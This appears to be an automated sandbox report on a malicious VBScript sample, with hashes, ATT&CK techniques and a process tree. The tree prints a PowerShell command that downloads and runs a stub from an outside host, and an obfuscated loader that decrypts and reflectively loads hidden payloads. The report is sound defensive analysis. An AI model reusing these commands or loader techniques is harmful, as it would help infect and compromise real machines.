18953637935c5dd79eeb9783f6d96fef1746fdd9cb5d3b449ef8f9a16af8758f

General

Target

6890_output.vbs
Size

46KB
MD5

653bf44f38fbe35cb4a51a366cce85e1
SHA1

5f08110e8b8174d62eb8beb3d8eedf507dc6471c
SHA256

0442d85e2af50c1f41e7cbf46850a204cf7cfd49eb5f0244e8b60cc28c313c24
SHA512

ed5c78d769eed4667ce8cceb14af498fcf41c36db88e47611f2157708513955a188a9aa60404cb99f632ca2b10596dfad60df3a9320083b92da14529ebdded19
SSDEEP

768:msJNohJ2GoBFClzkP/TFYgZutKI/OLixhGpOQU40GmaXQq9+RfomiJrW7PuA9:mTWGsClzkmtKIxGp1UOmWYfomiKH

Score

6^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2400	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2764	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2400	powershell.exe
2764	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2148 wrote to memory of 2052	2148	WScript.exe	30
PID 2148 wrote to memory of 2052	2148	WScript.exe	30
PID 2148 wrote to memory of 2052	2148	WScript.exe	30
PID 2052 wrote to memory of 2400	2052	cmd.exe	32
PID 2052 wrote to memory of 2400	2052	cmd.exe	32
PID 2052 wrote to memory of 2400	2052	cmd.exe	32
PID 2148 wrote to memory of 2848	2148	WScript.exe	34
PID 2148 wrote to memory of 2848	2148	WScript.exe	34
PID 2148 wrote to memory of 2848	2148	WScript.exe	34
PID 2848 wrote to memory of 2620	2848	cmd.exe	36
PID 2848 wrote to memory of 2620	2848	cmd.exe	36
PID 2848 wrote to memory of 2620	2848	cmd.exe	36
PID 2620 wrote to memory of 2808	2620	cmd.exe	38
PID 2620 wrote to memory of 2808	2620	cmd.exe	38
PID 2620 wrote to memory of 2808	2620	cmd.exe	38
PID 2620 wrote to memory of 2764	2620	cmd.exe	39
PID 2620 wrote to memory of 2764	2620	cmd.exe	39
PID 2620 wrote to memory of 2764	2620	cmd.exe	39
PID 2620 wrote to memory of 2764	2620	cmd.exe	39

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6890_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c.bat';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "
      4⤵
      PID:2808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
45KB

MD5
5e75db78b4eefa9d95b411029918152d

SHA1
1d973f2303effe01afd04f4e2f4cb11eb0ea7880

SHA256
837356ed1c9ccee26cec4e28385becea54f6ce2ed876e16ef788f9572d97befb

SHA512
f3f33476c5a6e1e1941a3e00f458cca79f9cdfba1c1d67f88e1af2d626f3e61cf7bcc8ef21cc9041ecd70e7c393e4f3a5cbcd3f58e0d4dfb08c22682b0f6e1dd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\45GH97N7DKFN2QHNNXZX.temp

Filesize
7KB

MD5
c074e5048927dca7e62504c8b5b0507c

SHA1
95dd0c60c23e49f0cd3e460b1f2c17a4b16631b4

SHA256
16004c23874c63fe753f6c8e42d70ae82182bd30e9411147ad0439cd60f8bf7a

SHA512
adfcf33a02a08ebcd5d60a18cd9cfa033efceab46b2fdf116a1befa52fc686954d07c3c7818c478e1bbf18b85d5404473fbc7d705c9692a8c1f3191dc4698d81

Download Submit
memory/2400-4-0x000007FEF614E000-0x000007FEF614F000-memory.dmp

Filesize
4KB

Download
memory/2400-6-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Filesize
9.6MB

Download
memory/2400-9-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Filesize
9.6MB

Download
memory/2400-8-0x0000000002240000-0x0000000002248000-memory.dmp

Filesize
32KB

Download
memory/2400-7-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Filesize
9.6MB

Download
memory/2400-5-0x000000001B820000-0x000000001BB02000-memory.dmp

Filesize
2.9MB

Download
memory/2400-10-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Filesize
9.6MB

Download
memory/2400-11-0x000007FEF5E90000-0x000007FEF682D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing